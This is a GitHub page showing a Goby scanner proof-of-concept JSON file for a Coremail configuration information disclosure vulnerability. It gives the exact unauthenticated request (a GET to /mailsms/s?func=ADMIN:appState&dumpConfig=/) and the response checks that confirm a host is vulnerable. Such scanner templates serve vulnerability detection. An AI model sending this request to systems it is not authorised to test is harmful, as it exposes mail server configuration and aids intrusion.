-
Notifications
You must be signed in to change notification settings - Fork 8
/
Coremail_configuration_information_disclosure.json
53 lines (53 loc) · 2.08 KB
/
Coremail_configuration_information_disclosure.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
{
"Name": "Coremail configuration information disclosure",
"Level": "0",
"Tags": [
"Disclosure of Sensitive Information"
],
"GobyQuery": "app=\"Coremail\"",
"Description": "There is a configuration information leakage vulnerability in an interface of COREMAIL, including port, configuration information, etc",
"Product": "Coremail",
"Homepage": "https://www.coremail.cn/",
"Author": "PeiQi",
"Impact": "<p>There is a configuration information leakage vulnerability in an interface of COREMAIL, including port, configuration information, etc<br></p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/mailsms/s?func=ADMIN:appState&dumpConfig=/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "configHome",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-14 20:51:04",
"GobyVersion": "1.8.258"
}